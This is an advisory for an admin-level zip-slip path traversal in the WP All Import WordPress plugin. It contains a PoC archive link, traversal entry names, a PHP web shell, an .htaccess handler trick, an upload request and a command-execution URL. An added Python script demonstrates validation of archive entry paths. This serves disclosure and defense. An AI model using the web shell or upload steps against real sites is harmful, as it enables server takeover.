wpexploit (Lucy) WPEX-ID:11E73C23-FF5F-42E5-A4B0-0971652DCEA1
History: Oct 14, 2022 - 12:00 a.m.

WP All Import < 3.6.9 - Admin+ Directory traversal via file upload

Published: 2022-10-14 00:00:00
Author: lucy
Tags: wordpress, all import, vulnerability, directory traversal, file upload, security, exploit, command execution

EPSS: 0.001 (Low), percentile 35.8%

The plugin is not validating the paths of files contained in uploaded zip archives, allowing highly privileged users, such as admins, to write arbitrary files to any part of the file system accessible by the web server via a path traversal vector.

[1] Download 'poc.zip' via 'https://github.com/lucy-official/TIL/raw/main/Security/Test%20Files/Zipslip/poc.zip'

 poc.zip contains the following two entries, whose names carry '../' sequences that the plugin does not strip or reject:
 -> '../../../../../../../../../../var/www/html/exploit.php.txt'
 -> '../../../../../../../../var/www/html/.htaccess'

 [1-1] '../../../../../../../../../../var/www/html/exploit.php.txt' is as follows.
 ----------------------------------
 <?php system($_GET['cmd']); ?>
 ----------------------------------

 [1-2] '../../../../../../../../var/www/html/.htaccess' is as follows.
 ----------------------------------
 <IfModule mod_rewrite.c>
 [same as the existing .htaccess data]
 AddHandler application/x-httpd-php .php .html
 </IfModule>
 ----------------------------------

[2] Upload the 'poc.zip' via the button [Upload a file] on 'http://localhost/wp-admin/admin.php?page=pmxi-admin-import'

[3] Access 'http://localhost/exploit.php.txt?cmd=id' in order to execute arbitrary commands. The AddHandler line in the uploaded .htaccess makes Apache pass the '.php.txt' file to PHP, since mod_mime applies a handler for any matching extension in the file name, not only the last one.
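The following Python script is an added illustration, not code from the advisory or from the WP All Import plugin. It builds an archive with the same two traversal entry names described for poc.zip above (the entry contents are constructed placeholders), shows the destination paths a naive extractor would write to, and implements the entry-path validation the advisory says is missing: every entry is resolved against the intended extraction directory and rejected if it would land outside it. The extraction directory and the benign 'import/feed.xml' entry are assumptions for the demonstration.

```python
import io
import os
import tempfile
import zipfile

# Constructed archive mirroring the two entry names described for poc.zip above;
# the contents are placeholders, not the real poc.zip payload.
POC_ENTRIES = {
    "../../../../../../../../../../var/www/html/exploit.php.txt": b"<?php system($_GET['cmd']); ?>\n",
    "../../../../../../../../var/www/html/.htaccess": b"AddHandler application/x-httpd-php .php .html\n",
}


def build_zip(entries):
    """Return the bytes of a zip whose entry names are stored verbatim ('../' included)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def planned_targets_vulnerable(zip_bytes, dest_dir):
    """Dry run of an unvalidated extractor: dest_dir joined with the raw entry name.

    Nothing is written; this only shows where the '../' entries would end up.
    """
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [os.path.normpath(os.path.join(dest_dir, n)) for n in zf.namelist()]


def resolves_inside(dest_dir, entry_name):
    """True only if the entry, fully resolved, stays under dest_dir.

    Covers '../' sequences, absolute POSIX paths, and Windows drive/backslash forms.
    """
    root = os.path.realpath(dest_dir)
    normalised = entry_name.replace("\\", "/")  # treat backslashes as separators too
    if normalised.startswith("/") or (len(normalised) > 1 and normalised[1] == ":"):
        return False
    target = os.path.realpath(os.path.join(root, normalised))
    return target == root or target.startswith(root + os.sep)


def unsafe_entries(zip_bytes, dest_dir):
    """Names of entries that would escape dest_dir; an upload handler should reject the archive if non-empty."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [n for n in zf.namelist() if not resolves_inside(dest_dir, n)]


def extract_safe(zip_bytes, dest_dir):
    """Extract only after every entry passed resolves_inside(); returns the written paths."""
    bad = unsafe_entries(zip_bytes, dest_dir)
    if bad:
        raise ValueError("refusing archive with traversal entries: %r" % bad)
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            target = os.path.realpath(os.path.join(dest_dir, info.filename))
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(target)
    return written


def demo():
    """Run the vulnerable dry run and the hardened extractor in a scratch directory (assumed upload dir)."""
    with tempfile.TemporaryDirectory() as dest:
        poc = build_zip(POC_ENTRIES)
        benign = build_zip({"import/feed.xml": b"<items/>"})  # constructed harmless upload
        try:
            extract_safe(poc, dest)
            poc_blocked = False
        except ValueError:
            poc_blocked = True
        root = os.path.realpath(dest)
        return {
            "vulnerable_targets": planned_targets_vulnerable(poc, dest),
            "poc_unsafe": unsafe_entries(poc, dest),
            "poc_blocked": poc_blocked,
            "benign_written": [os.path.relpath(p, root) for p in extract_safe(benign, dest)],
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The dry run shows both entries resolving to /var/www/html regardless of the upload directory, which is exactly the write primitive the advisory describes; the same archive is rejected outright by extract_safe, while the benign archive extracts normally.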


[+++] PoC Request Packet Sample
POST /wp-admin/admin.php?page=pmxi-admin-settings&action=upload&_wpnonce=afb6fb6e5c HTTP/1.1
Host: localhost
Content-Length: 1333
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrhApgY7BhUu88AGu
Accept: */*
Origin: http://localhost
Referer: http://localhost/wp-admin/admin.php?page=pmxi-admin-import
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [wordpress-admin-cookie]
Connection: close

------WebKitFormBoundaryrhApgY7BhUu88AGu
Content-Disposition: form-data; name="name"

poc.zip
------WebKitFormBoundaryrhApgY7BhUu88AGu
Content-Disposition: form-data; name="chunk"

0
------WebKitFormBoundaryrhApgY7BhUu88AGu
Content-Disposition: form-data; name="chunks"

1
------WebKitFormBoundaryrhApgY7BhUu88AGu
Content-Disposition: form-data; name="async-upload"; filename="poc.zip"
Content-Type: application/zip

[poc.zip payload]
[ - you can download it via 'https://github.com/lucy-official/TIL/raw/main/Security/Test%20Files/Zipslip/poc.zip']
------WebKitFormBoundaryrhApgY7BhUu88AGu--
